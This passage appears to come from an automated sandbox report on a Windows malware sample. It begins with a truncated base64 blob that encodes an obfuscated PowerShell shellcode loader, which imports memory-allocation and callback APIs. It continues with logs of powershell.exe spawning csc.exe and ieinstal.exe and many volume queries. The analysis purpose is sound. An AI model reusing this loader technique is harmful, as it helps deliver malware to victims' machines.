CgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMANgAsAHIAZQBmACAASQBuAHQAMwAyACAARQB1AGMAYQBpADUALABpAG4AdAAgAEsAVQBSAEUAUgBFAE4ASQBOACwAcgBlAGYAIABJAG4AdAAzADIAIABPAHAAaQBzAHQAaABvAGMAMwAsAGkAbgB0ACAATQBlAHQAcgA1ACwAaQBuAHQAIABPAHAAaQBzAHQAaABvAGMAMwA3ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBGAGkAbABlAEEAKABzAHQAcgBpAG4AZwAgAEQATwBCAEIARQAsAHUAaQBuAHQAIABPAG0AcAByAG8AZwByAGEAbQBtADIALABpAG4AdAAgAGoAYQBjAGsAcABvAHQAZAAsAGkAbgB0ACAATwBwAGkAcwB0AGgAbwBjADMAMAAsAGkAbgB0ACAATQBlAHQAYQBzAHkALABpAG4AdAAgAFQAcgBvAG4AdABhAGwAZQByACwAaQBuAHQAIABTAHAAbgBkAGUAcwBrADMAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAFIAZQBhAGQARgBpAGwAZQAoAGkAbgB0ACAASwBVAFIARQBSAEUATgBJAE4AMAAsAHUAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgAxACwASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgAyACwAcgBlAGYAIABJAG4AdAAzADIAIABLAFUAUgBFAFIARQBOAEkATgAzACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAYQBsAGwAVwBpAG4AZABvAHcAUAByAG8AYwBXACgASQBuAHQAUAB0AHIAIABLAFUAUgBFAFIARQBOAEkATgA1ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA2ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA3ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA4ACwAaQBuAHQAIABLAFUAUgBFAFIARQBOAEkATgA5ACkAOwANAAoAfQANAAoAIgBAAA0ACgAjAEEAZABhAHAAdABpAG8AbgBzAG0AOQAgAGMAbwB0AHQAaQBkAGEAZQB1AGQAIABrAG4AaQByAGsAZQByAGkAIABMAGsAawBlAHIAZgBsADkAIABGAEkAUwBLAEUAIABTAHYAdgBlADcAIAB1AGQAYQBkAGwAIAB1AGYAcgBhAHYAIABEAGkAcwB0AHIAaQBiAHUAdAA2ACAAVABBAEcAQQBTAFMAIABNAGEAbgB1ACAAVQBiAHIAbABpAGcAZAB1ACAAQwBvAGwAbwBsAGkAIAANAAoAVABlAHMAdAAtAFAAYQB0AGgAIAAiAEYATABBAFMAIgAgAA0ACgAkAE8AcABpAHMAdABoAG8AYwAzADIAPQAiACQAZQBuAHYAOgB0AGUAbQBwACIAIAArACAAIgBcAEQAZQBwAG8AcAB1AGwAYQB0AG8AMgAuAGQAYQB0ACIADQAKACMARwBBAFMAVABVAFIAIABiAG	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uotckr0j.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vybs2gqu.cmdline
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES34E6.tmp" "c:\Users\user\AppData\Local\Temp\CSC77023F4354E6477E97855CB603CA0.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES728B.tmp" "c:\Users\user\AppData\Local\Temp\CSC9CB81DB86B7E400B9F74BAF89293FF3.TMP"

Source: ieinstal.exe, 00000007.00000002.16989269284.000000001EA43000.00000004.00000010.sdmp, ieinstal.exe, 00000007.00000002.16982053699.0000000003840000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: ieinstal.exe, 00000007.00000002.16982053699.0000000003840000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: ieinstal.exe, 00000007.00000002.16982053699.0000000003840000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: ieinstal.exe, 00000007.00000002.16982053699.0000000003840000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
